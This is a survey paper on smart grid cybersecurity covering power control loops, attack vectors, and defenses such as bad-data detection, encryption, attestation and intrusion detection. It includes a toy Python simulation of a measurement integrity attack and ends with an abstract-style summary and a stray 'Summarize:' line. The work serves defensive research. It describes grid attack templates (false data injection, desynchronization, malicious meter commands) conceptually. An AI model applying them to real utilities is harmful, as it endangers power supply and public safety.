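```python
# Sketch of the generic loop of Fig. 3: the control center reads a
# measurement y(t), compares it with a setpoint, and sends a correction
# u(t) to an actuator. An integrity attack that scales the reported
# measurement quietly shifts the operating point.

def run_loop(steps: int, setpoint: float, attack_gain: float = 1.0) -> float:
    y = 0.0      # physical quantity being regulated (e.g., voltage)
    gain = 0.5   # proportional controller gain (assumed)
    for _ in range(steps):
        y_reported = attack_gain * y         # integrity attack corrupts y(t)
        u = gain * (setpoint - y_reported)   # control decision u(t)
        y += u                               # simplistic plant response
    return y

print(run_loop(50, 1.0))                   # honest y(t): settles at setpoint
print(run_loop(50, 1.0, attack_gain=0.5))  # corrupted y(t): settles too high
```

With honest telemetry the loop converges to the setpoint; with the measurement scaled down by half, the controller keeps pushing and the true state settles at twice the intended value, an impact the control center cannot see from its own (corrupted) feedback.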
It is important to study and analyze the impacts of such attacks on the power system, as they could severely affect its security and reliability. These impacts can be measured in terms of loss of load or violations in system operating frequency and voltage, and their secondary impacts. Attack studies will also help develop countermeasures that can prevent attacks or mitigate their impact; countermeasures include bad data detection techniques and attack-resilient control algorithms. This section presents a classification of prominent control loops under generation, transmission, and distribution. Traditional supervisory control and data acquisition (SCADA), local, and emerging smart grid controls have been identified. For each control loop, known vulnerabilities, attack templates, and potential research directions have also been highlighted.

A. Generation Control and Security

The control loops under generation primarily involve controlling the generator power output and terminal voltage. Generation is controlled by both local (automatic voltage regulator and governor control) and wide-area (automatic generation control) control schemes, as explained in this section. Fig. 4 identifies the various parameters associated with the control loops in the generation system.

1) Automatic Voltage Regulator (AVR): Generator exciter control is used to improve power system stability by controlling the amount of reactive power being absorbed or injected into the system [16]. Digital control equipment for the exciter enables testing of different algorithms for system stability improvement.

[Fig. 3: A typical power system control loop.]
[Fig. 4: Generation control classification.]

Hence, this cost-effective
approach is widely preferred and used by generation utilities. The digital exciter control module is connected to the plant control center via Ethernet and communicates using protocols such as Modbus [17]. This Ethernet link is used to program the controller with voltage setpoint values. The AVR control loop receives generator voltage feedback from the terminal and compares it with the voltage setpoint stored in memory. Based on the difference between the observed measurement and the setpoint, the current through the exciter is modified to maintain voltage at the desired level.

2) Governor Control: Governor control is the primary frequency control mechanism. It employs a sensor that detects the changes in speed that accompany disturbances, and accordingly alters settings on the steam valve to change the power output from the generator. The controllers used in modern digital governor control modules make use of the Modbus protocol to communicate with computers in the control center via Ethernet [18]. As in the case of the AVR, this communication link is used to define the operating setpoint for governor control.

a) Cyber vulnerabilities and solutions: The AVR and the governor control are local control loops. They do not depend on the SCADA telemetry infrastructure for their operations, as both the terminal voltage and the rotor speed are sensed locally; hence, the attack surface for these control loops is limited. Having said that, these applications are still vulnerable to malware that could enter the substation LAN through other entry points such as USB keys. Also, the digital control modules in both control schemes do possess communication links to the plant control center. To target these control loops, an adversary could compromise plant cybersecurity mechanisms and gain an entry point into the local area network.
Once this intrusion is achieved, an adversary can disrupt normal operation by corrupting the logic or settings in the digital control boards. Hence, security measures that validate control commands, even those originating within the control center, have to be implemented.

3) Automatic Generation Control: The automatic generation control (AGC) loop is a secondary frequency control loop concerned with fine-tuning the system frequency to its nominal value. The function of the AGC loop is to make corrections to inter-area tie-line flow and frequency deviation. The AGC ensures that each balancing authority area compensates for its own load change and that the power exchange between two control areas is limited to the scheduled value. The algorithm correlates frequency deviation and the net tie-line flow measurements to determine the area control error, the correction that is sent to each generating station to adjust operating points once every five seconds. Through this signal, the AGC ensures that each balancing authority area meets its own load changes and that the actual power exchanged remains as close as possible to the scheduled exchange.

a) Cyber vulnerabilities and solutions: The automatic generation control relies on tie-line and frequency measurements provided by the SCADA telemetry system. An attack on AGC could have direct impacts on system frequency, stability, and economic operation. DoS-type attacks might not have a significant impact on AGC operation unless supplemented with another attack that requires AGC operation. The following research efforts have identified the impact of data corruption and intrusion on the AGC loop. Esfahani et al. [19] propose a technique using reachability analysis to gauge the impact of an intrusion attack on the AGC loop.
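The area control error computation described above can be sketched as follows. The text only says the algorithm "correlates" frequency deviation and net tie-line flow; the standard textbook form ACE = ΔP_tie + B·Δf is assumed here, and the bias B and the measurement values are illustrative, not from the paper.

```python
# Sketch of the AGC correction dispatched roughly every 5 s: the area
# control error combines tie-line flow deviation with biased frequency
# deviation. B and all measurements below are hypothetical.

B = 20.0  # frequency bias of the balancing area, MW per 0.1 Hz (assumed)

def area_control_error(dp_tie_mw: float, df_hz: float) -> float:
    """ACE = dP_tie + B * df, using the standard textbook form."""
    return dp_tie_mw + B * (df_hz / 0.1)

# Honest telemetry: slight excess export, slight under-frequency.
print(area_control_error(5.0, -0.02))

# Corrupted telemetry (in the spirit of the attack template of [20]):
# a falsified frequency deviation drives a large, unnecessary correction.
print(area_control_error(5.0, -0.5))
```

Because the correction is dispatched automatically, a falsified Δf or ΔP_tie translates directly into generation changes, which is why AGC is singled out as sensitive to data integrity attacks.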
In [20], Sridhar and Manimaran develop an attack template that appropriately modifies the frequency and tie-line flow measurements to drive the system frequency to abnormal operating values. Areas of future research include: 1) evaluating the impacts of DoS attacks on the AGC loop in combination with other attacks that trigger AGC operation; and 2) the development of domain-specific bad data detection techniques for AGC to identify data integrity attacks.

B. Transmission Control and Security

The transmission system normally operates at voltages in excess of 13 kV, and the components controlled include switching and reactive power support devices. It is the responsibility of the operator to ensure that the power flowing through the lines is within safe operating margins and that the correct voltage is maintained. The following control loops assist the operator in this functionality.

[Fig. 5: Transmission control classification.]

Fig. 5 summarizes the communication protocols and other
The control center performscomputations using thousands of measurements it receivesthrough the wide-area network. A good amount of work has been done in developing tech niques to detect bad data in state estimation [21] [26]. These techniques provide goodestimates of state variables despite errors introduced bydevice and channel imperfecti ons. However, they were not designed to be fault tolerant when malicious data areinjected with intent. a) Cyber vulnerabilities and solutions: Bad data detec- tion in state estimation is well researched. However, these techniques were developed for errors in data that appear due to communication channel o r device malfunctioning. When an adversary launches an attack directed at disrupt-ing the smooth functioning of state estimation, these tech-niques might not be able to detect the presence ofmalicious data. Liu et al. created a class of attacks, called false data injection attacks, that escape detection by existing bad measurement identification algorithms, provided they had knowledge of the system configuration [27]. It was deter-mined that to inject false data into a single state variable inthe IEEE 300-bus system, it was sufficient to compromiseten meters. In [28], Kosut et al. verify that the impact from false data injection attack discussed in [27] is the same asremoving the attacked meters form the network. Theauthors also propose a graph-theoretic approach to deter- mine the smallest set of meters that have to be compro- mised to make the power network unobservable. Bobba et al. [29] developed a technique to detect false data injection attacks. The idea was to observe a subset ofmeasurements and perform calculations based on them todetect malicious data. Xie et al. show that a successful attack on state estimation could be used in the electricitymarkets to make financial gains [30]. 
As settlements between utilities are calculated based on values from state estimation, the authors show that a profit of $8/MWh can be made by tampering with meters that provide line flow information.

2) VAR Compensation: Volt-ampere reactive (VAR) compensation is the process of controlling reactive power injection or absorption in a power system to improve the performance of the transmission system. The primary aim of such devices is to provide voltage support, that is, to minimize voltage fluctuation at a given end of a transmission line. These devices can also increase the power transferable through a given transmission line and have the potential to help avoid blackout situations. Synchronous condensers and mechanically switchable capacitors and inductors were the conventional VAR compensation devices. However, with recent advancements in thyristor-based controllers, devices such as the ones belonging to the flexible AC transmission systems (FACTS) family are gaining popularity. FACTS devices interact with one another to exchange operational information [31]. Though these devices function autonomously, they depend on communication with other FACTS devices for the information needed to determine their operating point.

a) Cyber vulnerabilities and solutions: In [32], the authors provide a list of attack vectors that could be used against cooperating FACTS devices (CFDs). Though attacks such as denial of service and data injection are well studied and understood in the traditional IT environment, the authors provide insight into what these attacks mean in a CFD environment.

1) Denial of cooperative operation: This is a DoS attack in which the communication to some or all of the FACTS devices could be jammed by flooding the network with spurious packets. This results in the loss of critical information exchange and thus affects long-term and dynamic control capabilities.
2) Desynchronization (timing-based attacks): The control algorithms employed by CFDs are time dependent and require strict synchronization. An attack of this kind could disrupt the steady operation of CFDs.

3) Data injection attacks: This type of attack requires an understanding of the communication protocol. The attack could be used to send incorrect operational data such as status and control information, which may result in unnecessary VAR compensation and in unstable operating conditions. Attack templates of this type were implemented on the IEEE 9-bus system, and the results are presented in [33].

3) Wide-Area Monitoring Systems: PMU-based wide-area measurement systems are currently being installed in the United States and other parts of the world. The phase angles of voltage phasors measured by PMUs directly help in the computation of real power flows in the network, and could thus assist in decision making at the control center. PMU-based control applications are yet to be used for real-time control. However, Phadke and Thorp [34] identify control applications that could be enhanced by using data
The North American SynchroPhasor Initiative(NASPInet) [35] effort aims to develop a wide-area com-munications infrastructure to support this PMU operation.It is recognized that PMU-based control applications willbe operational within the next five years. Hence, a secureand dependable WAN backbone becomes critical to power system stability. C. Distribution Control and Security The distribution system is responsible for delivering power to the customer. With the emergence of the smartgrid, additional control loops that enable direct control ofload at the end user level are becoming common. Thissection identifies key controls that help achieve this. Fig. 6identifies communication pro tocols and other parameters for key control loops in the distribution system. 1) Load Shedding: Load shedding schemes are useful in preventing a system collapse during emergency operatingconditions. These schemes can be classified into proactive,reactive, and manual. Active and proactive schemes areautomatic load shedding schemes that operate with thehelp of relays. For example, in cases where the system generation is insufficient to match up to the load, auto- matic load shedding schemes c ould be employed to main- tain system frequency within safe operating limits andprotect the equipment connected to the system. When theneed arises, load is shed by a utility at the distribution levelby the under-frequency relays connected to the distribu-tion feeder. a) Cyber vulnerabilities and solutions: Modern relays are Internet protocol (IP) ready and support communica- tion protocols such as IEC 61850. An attack on the relaycommunication infrastructure or a malicious change to the control logic could result in unscheduled tripping of dis- tribution feeders, leaving load segments unserved. Theoutage that occurred in Tempe, AZ, in 2007, is an exampleof how an improperly configured load-shedding program canresult in large-scale load shedding [36]. 
The distribution load-shedding program of the Salt River Project was unexpectedly activated, resulting in the opening of 141 breakers and a loss of 399 MW. The outage lasted 46 min and affected 98 700 customers. Though the incident occurred due to poor configuration management by the employees, it goes on to show the impact an adversary can cause if a substation is successfully intruded. 2) AMI and Demand Side Management: Future distribution systems will rely heavily on AMI to increase reliability, incorporate renewable energy, and provide consumers with granular consumption monitoring. AMI primarily relies on the deployment of "smart meters" at consumers' locations to provide real-time meter readings. Smart meters provide utilities with the ability to implement load control switching (LCS) to disable consumer devices when demand spikes. Additionally, demand side management [37] introduces a cyber physical connection between the metering cyber infrastructure and power provided to consumers. The meter's current configuration is controlled by a meter data management system (MDMS) which lies under utility control. The MDMS connects to an AMI headend device which forwards commands and aggregates data collected from the meters throughout the infrastructure [38]. Networking within the AMI infrastructure will likely rely on many different technologies including RF mesh, WiMax, WiFi, and power line carrier. Application layer protocols such as C12.22 or IEC 61850 will be utilized to transmit both electricity usage and meter control operations between the meters and the MDMS. Fig. 7 provides an overview of the control flows that could impact consumer power availability. a) Cyber vulnerabilities and solutions: The smart meters at consumer locations also introduce cyber physical concerns. Control over whether the meter is enabled or disabled and the ability to remotely disable devices through load control switching provide potential threats from attackers.
Adding additional security into these functions presents interesting challenges.
Fig. 6. Distribution control classification.
A malicious meter disabling command can likely be prevented through the use of time-wait periods [39]. Since meter disabling does not require a real-time response, meters could be programmed to wait some time after receiving a command before disabling the device. This prevention would only address remote attacks, as the prevention logic could be bypassed if an attacker compromises the meter. Malicious LCS commands could provide a greater challenge due to stricter temporal requirements. IV. SUPPORTING INFRASTRUCTURE SECURITY The development of a secure supporting infrastructure is necessary to ensure information is accurately stored and transmitted to the appropriate applications. While the supporting infrastructure may share some common properties with traditional IT systems, the variation is significant enough to introduce numerous unique and challenging security concerns [9]. Specific properties include: long system lifecycles (>10 years); limited physical environment protection; restricted updating/change management capabilities; heavy dependency on legacy systems/protocols; limited information processing abilities. A secure information system traditionally enforces the confidentiality of its data to protect against unauthorized access while ensuring its integrity remains intact. In addition, the system must provide sufficient availability of information to authorized users. The primary goal of any cyber physical system is to provide efficient control over some physical process.
This naturally prioritizes information integrity and availability to ensure control state closely mirrors the physical system state. Security mechanisms such as cryptography, access control, and authentication are necessary to provide integrity in systems; however, all security mechanisms tailored for this environment must also provide sufficient availability. This constraint often limits the utilization of security mechanisms which fail closed, as they may deny access to a critical function. The development of a trustworthy electric grid requires a thorough reevaluation of the supporting technologies to ensure they appropriately achieve the grid's unique requirements. The remainder of this section will address required security concerns within the supporting infrastructure and provide a review of current research efforts addressing these concerns. While there are a vast number of research areas within this domain, this paper will focus on areas with active security research tailored to the smart grid's supporting infrastructure. A. Secure Communication Power applications require a secure communications infrastructure to cope with the grid's geographically dispersed resources. Data transmission often utilizes wireless communication, dialup, and leased lines, which provide increased physical exposure and introduce additional risk. The grid is also heavily reliant on its own set of higher level control system protocols, including Modbus, DNP3, IEC 61850, and ICCP. Often these protocols were not developed to be attack resilient and lack sufficient security mechanisms. This section will detail how encryption, authentication, and access control can be added to current communications to provide increased security. 1) Encryption: Retrofitting communication protocols to provide additional security is necessary for their continued use within untrusted spaces.
Often this level of security can be obtained by deploying encrypted virtual private networks (VPNs) that protect network traffic through encapsulation within a cryptographic protocol [9]. Unfortunately, this solution is not always feasible as the industry is fairly dependent on non-IP networks. In addition, strict availability requirements may not be able to handle the added latency produced by a VPN. Research into bump-in-the-wire (BITW) encryption hardware attempts to ensure that messages can be appropriately encrypted and authenticated while limiting the latency appended by the solution. Work by Tsang and Smith provides a BITW encryption method that significantly reduces the latency through the reduction of message hold-back during the encryption and authentication [40]. Additional research has focused on retrofitting old protocols with appropriate security properties.
Fig. 7. Control functions within AMI.
Numerous efforts have addressed the modification of traditional SCADA protocols such as ICCP, DNP3, and Modbus to provide additional security while maintaining integration with current systems [41]-[43]. Deployment and key management activities still provide difficulties within geographically dispersed environments. 2) Authentication: Secure remote authentication presents a challenge due to the lengthy deployments and limited change management capabilities. Exposure of authentication credentials (e.g., keys and passwords) increases throughout their lifetime, and protocols become increasingly prone to attack due to continual security reviews and cryptanalysis advancements.
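The retrofitting idea discussed above (adding message authentication to a legacy protocol) can be sketched with Python's standard hmac module. The frame layout and pre-shared key here are invented for illustration; real deployments would need proper key management:

```python
import hashlib
import hmac

# Invented frame layout: payload || 32-byte HMAC-SHA256 tag.
KEY = b"pre-shared-demo-key"  # real deployments need proper key management

def wrap(payload: bytes) -> bytes:
    """Append an authentication tag to a legacy protocol payload."""
    tag = hmac.new(KEY, payload, hashlib.sha256).digest()
    return payload + tag

def unwrap(frame: bytes) -> bytes:
    """Verify the tag before handing the payload to the legacy stack."""
    payload, tag = frame[:-32], frame[-32:]
    expected = hmac.new(KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("authentication failed")
    return payload

frame = wrap(b"\x03\x00\x10")   # e.g., a legacy read-request payload
recovered = unwrap(frame)       # tag verifies, payload is returned
```

A BITW device would perform exactly this wrap/unwrap transparently on the wire; the hold-back latency that Tsang and Smith target comes from buffering the message while the tag is computed and checked.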
The development of strong, adaptive, and highly available authentication mechanisms is imperative to prevent unauthorized access. Research by Khurana et al. has defined design principles required for authentication protocols within the grid [44]. By defining authentication principles, future system designers can ensure their systems achieve the efficiency and adaptability required for continued secure use. Additionally, research into more flexible authentication protocols has been proposed by Chakravarthy to provide adaptability to long deployments [45]. The proposed protocol provides re-keying and remoduling algorithms to protect against key compromises and future authentication module vulnerabilities. 3) Access Control: While encryption and authentication can deter external attackers, they do little to protect against insider threats or attackers that have already gained some internal access. Attackers with access to a communication network may be able to leverage various protocol functionality to inject malicious commands into control functions. The likelihood of a successful attack could be significantly reduced by appropriately configuring software and protocol usage to disable unnecessary functionality. Evaluating industry protocols to identify potentially malicious functions is imperative to ensuring secure system configurations. Work by Mander dissects the DNP3 protocol, detailing the function codes and data objects that would be useful for attackers to access data, control, or impact the availability of a remote DNP3 master [46]. This research provides a foundation for understanding the likely physical impact from a compromised communication channel. Additional research in this domain models feasible attacks against a control system based on the current protocol specification [47]. More sophisticated protocols targeted for smart grid use, such as ANSI C12.22 and IEC 61850, require additional analysis to ensure secure implementation in new system deployments. B.
Device Security Embedded systems are used throughout the grid to support monitoring and control functions. The critical role placed on these devices introduces significant cybersecurity concerns due to their placement in physically unprotected environments. Large-scale deployments of embedded devices also incentivize the use of marginally cheaper hardware, leaving little computational capacity to support various security functions such as malware or intrusion monitoring. This also stymies the ability to produce the amount of entropy required to create secure cryptographic keys [48]. The development of secure computation within embedded platforms provides a key challenge throughout CPSs. 1) Remote Attestation: Smart meters provide one particularly concerning utilization of embedded systems due to their expansive deployments and impact on consumers. Research into the development of remotely attestable smart meters has suggested that a small static kernel can be used to cryptographically sign loaded firmware [49]. This resulting signature can then be sent as a response to attestation queries to verify meters have not been corrupted. By also providing support for remote firmware updates, the kernel can allow future reconfiguration of the devices while still providing a trusted platform. Unfortunately, these security mechanisms may still remain vulnerable to additional attack vectors [50]. Embedded devices also play important roles in the bulk power system. Intelligent electronic devices (IEDs) utilize embedded devices to control relays throughout the grid. Recent events have shown these devices can be maliciously reprogrammed to usurp intended control functions [5]. The development of improved attestation mechanisms will play a critical role in the cybersecurity enhancement of the grid. C.
Security Management and Awareness An increased awareness of security risk and appropriately managing security relevant information provide an equally important role in maintaining a trusted infrastructure. This section will address a range of security activities and tools including digital forensics and security incident/event management. 1) Digital Forensics: The ability to perform accurate digital forensics within the electric grid is imperative to identifying security failures and preventing future incidents. Strong forensic capabilities are also necessary during event investigation to determine the cause or extent of damage from an attack. While forensic analysis on traditional IT systems is well researched, the large number of embedded systems and legacy devices within the grid provides new challenges. Research efforts by Chandia et al. have proposed the deployment of "forensic agents" throughout the cyber infrastructure to collect data about potential attacks [51]. Information collected by these agents can then be prioritized based on their ability to negatively affect grid operations. Expanding forensic capabilities within embedded systems including meters and IEDs is necessary to ensure these critical resources maintain integrity. Additionally, operational systems may not be detached for forensic analysis, and research into online analysis methods should be explored for these instances. 2) Security Incident and Event Management: The development of technologies to collect and analyze interesting data sources such as system logs, IDS results, and network flow information is necessary to ensure data are properly organized and prioritized. Briesemeister et al.
researched the integration of various cybersecurity data sources within a control system and demonstrated its ability to detect attacks [52]. This work also coupled visualization tools to provide operators with a real-time understanding of network health. Tailoring this technology to provide efficient analysis of the grid will place an impetus on control system alarms, as they provide information on potential physical impacts initiated by cyber attacks. Incidents and events within the smart grid will vary greatly from their IT counterparts; analysis methods should be correlated with knowledge of the physical system to determine anomalies. Aggregation and analysis algorithms may need tailoring for environments with decreased incident rates due to smaller user bases and segregated networks. D. Cybersecurity Evaluation 1) Cybersecurity Assessment: The grid's security posture should be continually analyzed to ensure it provides adequate security. The system's complexity, long lifespans, and continuously evolving cyber threats present novel attack vectors. The detection and removal of these security issues should be addressed specific to both the power applications and supporting infrastructure. Current research has primarily focused on the supporting infrastructure as it maintains many similarities with more traditional cyber security testing. Methodologies used to perform vulnerability assessments and penetration testing have raised numerous cybersecurity concerns within the current grid [53], [54]. Smart grid technologies will present increasing inter-domain connectivity, thereby creating a more exposed cyber infrastructure and trust dependencies between many different parties. NIST's "Guidelines for Smart Grid Cyber Security" (NISTIR 7628) has proposed a more robust set of cybersecurity requirements to ensure the appropriateness of cyber protection mechanisms [2].
NIST identifies logical interfaces between systems and parties while assigning a criticality level (e.g., high, medium, low) for the interface's confidentiality, integrity, and availability requirements. The document then presents a list of necessary controls to provide an appropriate baseline security for the resulting interfaces. 2) Research Testbeds and Evaluations: Researching cyber physical issues requires the ability to analyze the relationship between the cyber and physical components. Real-world data sets containing system architecture, power flows, and communication payloads are currently unavailable. Without these data, researchers are unable to produce accurate solutions to modern problems. Increased collaboration between government, industry, and academia is required to produce useful data which can facilitate needed research. While SCADA testbeds provide a foundational tool for the basis of cyber physical research, ensuring that system parameters closely represent real-world systems remains a challenge. The development of SCADA testbeds provides critical resources to facilitate research within this domain. The National SCADA Test Bed (NSTB) hosted at Idaho National Laboratory provides a real-world test environment employing real bulk power system components and control software [55]. NSTB research has resulted in the discovery of multiple cyber vulnerabilities [56]. While this provides an optimal test environment, the cost is impractical for many research efforts. Work done by Sandia National Laboratory has utilized a simulation-based testbed allowing the incorporation of both physical and virtual components. The virtual control system environment (VCSE) allows the integration of various different power system simulators into a simulated network environment and industry standard control system software [57]. Academic efforts at Iowa State University and the University of Illinois at Urbana-Champaign provide similar environments [58], [59]. E.
Intrusion Tolerance While attempts to prevent intrusions are imperative to the development of a robust cyber infrastructure, failures in prevention techniques will likely occur. The ability to detect and tolerate intrusions is necessary to mitigate the negative effects from a successful attack. 1) Intrusion Detection Systems: The successful utilization of intrusion detection in the IT domain suggests it may also provide an important component in smart grid systems. Research by Cheung et al. has leveraged salient control system network properties into a basis for IDS technology [60]. Common data values, protocol functions, and communication endpoints were modeled by the IDS such that all violating packets could be flagged as malicious. While the previous research provides unique detection capabilities, an attacker may still be able to create packets which closely resemble normal communications. For example, a command to trip a breaker cannot be flagged as malicious since it is a commonly used control function. Producing grid-aware intrusion detection will require a built-in understanding of grid functions. Work by Jin et al. shows how basic power flow laws leveraging Bayesian reasoning can help reduce false positives by exhibiting a real-world understanding of the system [61]. The transition to smart grid technologies will likely reduce the number of IDS affable qualities compared to traditional SCADA communications. Performing intrusion detection in such a complex environment will require novel data collection mechanisms as well as the ability to detect and aggregate attack indicators across multiple network domains [62].
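The model-based detection approach described above, which flags packets whose protocol functions or endpoints fall outside the modeled normal set, can be sketched as follows. The addresses and function codes are invented for illustration:

```python
# Invented model of "normal" traffic: permitted endpoint pairs and
# permitted protocol function codes (Modbus-style numbers for illustration).
ALLOWED_ENDPOINTS = {("10.0.0.5", "10.0.0.20")}
ALLOWED_FUNCTIONS = {3, 6, 16}   # read holding regs, write reg, write regs

def is_suspicious(packet):
    """Flag any packet whose endpoints or function code violate the model."""
    if (packet["src"], packet["dst"]) not in ALLOWED_ENDPOINTS:
        return True
    return packet["func"] not in ALLOWED_FUNCTIONS

# An unmodeled diagnostic function code between known endpoints is flagged.
pkt = {"src": "10.0.0.5", "dst": "10.0.0.20", "func": 8}
```

As the text notes, such a model cannot flag a well-formed but malicious command (e.g., a legitimate breaker-trip function code from a known endpoint), which is what motivates grid-aware detection that also reasons about physical state.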
2) Tolerant Architectures: Intrusion tolerance mechanisms have recently gained increased attention as a method to ensure a system's ability to operate effectively during an attack. Research within the Crutial project attempts to explore both proactive and reactive mechanisms to prevent cyber attacks from impacting the system's integrity [63]. This research explores a Byzantine tolerant protection paradigm which assures correct operations as long as no more than f out of 3f + 1 components are attacked. Extended research within intrusion tolerance should incorporate the smart grid's specific availability requirements and infrastructure designs. Traditional models relying on Byzantine fault/intrusion tolerance mechanisms present significant cost and may not be practical within the smart grid. Future designs can leverage known physical system redundancies and recovery capabilities to assist with traditional intrusion/fault tolerance design models. V. EMERGING RESEARCH CHALLENGES As smart grid technologies become more prevalent, future research efforts must target a new set of cybersecurity concerns. This section documents emerging research challenges within this domain. A. Risk Modeling The risk modeling methodology and subsequent risk index should capture both the vulnerability of cyber networks in the smart grid and the potential impacts an adversary could inflict by exploiting these vulnerabilities. The cyber vulnerability assessment plan in risk modeling should be thorough. It should include all sophisticated cyber-attack scenarios such as electronic intrusions, DoS, data integrity attacks, timing attacks, and coordinated cyber attacks. The tests should be conducted on different vendors' solutions and configurations. The impact analysis should include dynamics introduced by new power system components and associated control, along with existing ones.
The analyses must check to see if any power system stability limits are violated for different attack templates. For example, current wind generation turbines offer uneconomical frequency control and do not contribute to system inertia. Hence, attack scenarios should include attacks on the system during high wind penetration. Managing exposure from increased attack surfaces due to the inclusion of the AMI and MDMS infrastructures, widespread communication links to distribution control centers, and potentially transmission and generation control centers. Impact studies should include attack vectors that target such devices and evaluate system stability. B. Risk Mitigation Algorithms As in the case of risk modeling, risk mitigation must include solutions at both the cyber and power system level. Consider the following attack scenario. One fundamental vision of the smart grid is to allow controllability of domestic devices by utilities to help reduce costs. If an adversary intrudes into the AMI network of a neighborhood to turn on large chunks of load when they are expected to be turned off, the system could experience severe stability problems. Cyber defense mechanisms that are able to detect/prevent such an attack, and power system defense mechanisms that ensure stable operation in the event of an attack, should be developed. Attack resilient control provides defense in depth to a CPS. In addition to dedicated cybersecurity software and hardware, robust control algorithms enhance security by providing security at the application layer. Measurements and other data obtained through the SCADA and emerging wide-area monitoring systems have to be analyzed to detect the presence of anomalies. For example, an application should first check if the obtained measurement lies within an acceptable range and reject the ones that do not comply. However, a smart attacker could develop attack templates that satisfy these criteria and force the operator into taking wrong control actions.
Hence, additional tests that are based on forecasts, historical data, and engineering sense should be devised to ascertain the current state of the system. An attack might not be successful if the malicious measurements do not conform to the dynamics of the system. In most cases, the physical parameters of the system (e.g., generator constants) are protected by utilities. These parameters play a part in determining the state of the system and system response to an event. Hence, algorithms that incorporate such checks could help in identifying malicious data when an attacker attempts to mislead the operator into executing incorrect commands. Intelligent power system control algorithms that are able to keep the system within stability limits during contingencies are critical. Additionally, the development of enhanced power management systems capable of addressing high-impact contingency scenarios is necessary. Domain-specific anomaly detection and intrusion tolerance algorithms that are able to classify measurements and commands as good/bad are key. In addition, built-in intelligence is required so that devices can respond appropriately to anomaly situations. C. Coordinated Attack Defense The power system, in most cases, is operated at (N-1) contingency condition and can inherently counter attacks that are targeted at single components. This means the effect from the loss of a single transmission line can be negated by rerouting power through alternate lines. However, the system was not designed to fend off attacks that target multiple components. Such coordinated attacks, when carefully structured and executed, can push the system outside the protection zone.
The increased attack surface introduced by the smart grid provides an opening for an adversary to plan such attacks. The North American Electric Reliability Corporation (NERC) has instituted the Cyber Attack Task Force (CATF) to gauge system risk from such attacks and develop feasible and cost-effective mitigation techniques [64]. Future mitigation strategies include the following. Risk modeling and mitigation of coordinated attacks is key to preventing the occurrence of attacks. Attack detection tools that monitor traffic and simultaneously correlate events at multiple substations could help in early identification of coordinated attack scenarios. Future power system planning and reliability studies should accommodate coordinated attack scenarios in their scope. Strategic enhancements to the power system infrastructure could help the system operate within stability limits during such scenarios. D. AMI Security Geographically distributed architectures with high availability requirements present numerous security and privacy concerns. Specific research challenges with AMI include: remote attestation of AMI components and tamper detection mechanisms to prevent meter manipulations; exploration of security failures due to common modal failures (e.g., propagating malware, remotely exploitable vulnerabilities, shared authenticators); model-based anomaly methods to determine attacks based on known usage patterns and fraud/attack detection algorithms; security versus privacy tradeoffs including inference capabilities of consumer habits, anonymization mechanisms, and anonymity concerns from both data-at-rest and data-in-motion perspectives. Numerous additional privacy concerns have been raised within the smart grid; NIST has provided a more comprehensive review of these concerns [2]. E. Trust Management The dynamic nature of the smart grid will require complex notions of trust to evaluate the acceptability of system inputs/outputs.
Dynamic trust distribution with adaptability for evolving threats and likely cybersecurity failures (e.g., exposed authenticators, unpatched systems) and grid emergencies (e.g., cascading failures, natural disasters, personnel issues). Trust management based on data source (e.g., SCADA field device, adjacent utilities) and verification of trust allocations for low-trust systems (physically unprotected, limited attribution capabilities), along with trust verification mechanisms/algorithms and impact analysis of trust manipulation mechanisms. Aggregation of trust with increasing data/verification sources (e.g., more sensors, correlations with previous knowledge of grid status) and accumulation of trust requirements throughout AMI. F. Attack Attribution Attack attribution will play an important role in deterrence within the smart grid. High availability requirements limit the ability to disconnect potential victims within the control network, especially when stepping-stone attack methods are used. Attribution capabilities within/between controlled networks including AMI, wide area measurement systems, and control networks. Leveraging known information flows, data formats, and packet latencies. Identifying stepping-stone attacks with utility owned/managed infrastructures based on timing analysis, content inspection, and packet marking/logging schemes. Methods to reduce insider threat impacts while maintaining appropriate adaptability in emergency situations, such as improved flexibility of authorization and authentication or defense-in-depth implementations. G. Data Sets and Validation Research within the smart grid realm requires realistic data and models to assure accurate results and real-world applicability. Data models for SCADA networks, AMI, and wide area monitoring networks, including communication protocols, common information models (CIM), and data sources/sinks. Temporal requirements for data (e.g., 4 ms for protective relaying, 1-4 s for SCADA, etc.)
and realistic data sets of control-loop interactions (e.g., AGC, voltage regulation, substation protection schemes). VI. CONCLUSION A reliable smart grid requires a layered protection approach consisting of a cyber infrastructure which limits adversary access and resilient power applications that are able to function appropriately during an attack. This work provides an overview of smart grid operation, associated cyber infrastructure, and power system controls that directly influence the quality and quantity of power delivered to the end user. The paper identifies the importance of combining both power application security and supporting infrastructure security into the risk assessment process and provides a methodology for impact evaluation. A smart grid control classification is introduced to clearly identify communication technologies and control messages required to support these control functions. Next, a review of current cyber infrastructure security concerns is presented to both identify possible weaknesses and address current research efforts. Future smart grid research challenges are then highlighted, detailing the cyber physical security relationship within this domain. While this work focuses on the smart grid environment, the general application and infrastructure framework, including many of the research concerns, will also transition to other critical infrastructure domains.
Summary:
The development of a trustworthy smart grid requires a deeper understanding of potential impacts resulting from successful cyber attacks. Estimating feasible attack impact requires an evaluation of the grid's dependency on its cyber infrastructure and its ability to tolerate potential failures. A further exploration of the cyber physical relationships within the smart grid and a specific review of possible attack vectors is necessary to determine the adequacy of cybersecurity efforts. This paper highlights the significance of cyber infrastructure security in conjunction with power application security to prevent, mitigate, and tolerate cyber attacks. A layered approach to evaluating risk is introduced, based on the security of both the physical power applications and the supporting cyber infrastructure. A classification is presented to highlight dependencies between the cyber physical controls required to support the smart grid and the communication and computations that must be protected from cyber attack. The paper then presents current research efforts aimed at enhancing the smart grid's application and infrastructure security. Finally, current challenges are identified to facilitate future research efforts.
Summarize:
